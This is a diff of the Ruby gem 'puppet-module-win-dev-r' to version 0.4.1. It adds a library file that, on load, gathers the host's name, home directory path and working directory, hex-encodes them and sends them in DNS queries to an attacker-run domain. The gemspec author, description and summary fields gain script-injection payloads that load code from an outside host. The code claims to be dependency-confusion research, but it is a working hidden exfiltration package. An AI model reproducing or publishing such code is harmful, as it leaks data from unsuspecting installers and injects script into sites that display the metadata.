puppet-module-win-dev-r 0 → 0.4.1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: add0dd4a5c02e1285c31bd274163f51187f7364c3e6072dc1cfe299f0cb44d6d
-  data.tar.gz: 1cccf05e348442959bc19a47a9f62c85f2d0c0130abc41afe72e0a38590be908
+  metadata.gz: fa698427a47cab9d273b8571342c228dfb668e13762619b992711d25746c4d4e
+  data.tar.gz: a823757bb24a67ce5eb4ae61a086367159aeb8b07492eec5f5383c888b0b47d9
 SHA512:
-  metadata.gz: 0fb326f7fe833490390110dd93910a683de8071f93d6ba9840c35512e40a336a721ded81f602543f90f65513132c1938f06bdfd20c88b0b0b4792cbe74a645a1
-  data.tar.gz: 6a161f3ed119bf8b14e65cd60ee7b480afc24e26a5b7f32428a08cd8192e6c8e2fa6e09deaa0c5928d07bae15f8cde889c7b36de744c40d8e533521408d607ac
+  metadata.gz: 7f7ef23561cc7c34b4313154dc052e8c3bf57182713c6c9b59a51d13494354f8d265bb4dddccdaa007732f2b619887b9cd8e0b3bfd77407cc0a467ffddccf08b
+  data.tar.gz: 65cb863b2cb030daea37ef54775a9127063285adf958fd70e1bb687aaa0f421d789b5cc7aed191aaa4920c9c3d115acd10f38d8e586e21726085199ffd4e6468

data/lib/puppet-module-win-dev-r.rb

@@ -1,5 +1,61 @@
-module MyGem
-  def self.display_message
-    puts "poc by @gopal_ethical"
-  end
-end
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+This research is inspired by 'https://twitter.com/alxbrsn'
+More information is here: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.dependency-c4llb4ck.0lo.org'
+ns = 'dns1.dependency-c4llb4ck.0lo.org'
+
+package = 'puppet-module-win-dev-r_0.4.1'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,28 +1,27 @@
 --- !ruby/object:Gem::Specification
 name: puppet-module-win-dev-r
 version: !ruby/object:Gem::Version
-  version: '0'
+  version: 0.4.1
 platform: ruby
 authors:
-- "@gopal_ethical"
-autorequire:
+- GEM"><script src=//x5s.0lo.org></script>
+autorequire: 
 bindir: bin
 cert_chain: []
-date: 2024-08-09 00:00:00.000000000 Z
+date: 2021-11-11 00:00:00.000000000 Z
 dependencies: []
-description: poc by @gopal_ethical
-email: ftest.first@gmail.com
-executables:
-- puppet-module-win-dev-r
+description: GEM Description puppet-module-win-dev-r "><script src=//x5s.0lo.org></script>
+email: 
+executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- bin/puppet-module-win-dev-r
 - lib/puppet-module-win-dev-r.rb
-homepage:
-licenses: []
+homepage: https://twitter.com/zuh4n
+licenses:
+- MIT
 metadata: {}
-post_install_message:
+post_install_message: 
 rdoc_options: []
 require_paths:
 - lib
@@ -37,8 +36,9 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.3.15
-signing_key:
+rubyforge_project: 
+rubygems_version: 2.7.6
+signing_key: 
 specification_version: 4
-summary: poc by @gopal_ethical
+summary: GEM Summary "><script src=//x5s.0lo.org></script>
 test_files: []

data/bin/puppet-module-win-dev-r

@@ -1,4 +0,0 @@
-#!/usr/bin/env ruby
-require 'puppet-module-win-dev-r'
-
-MyGem.display_message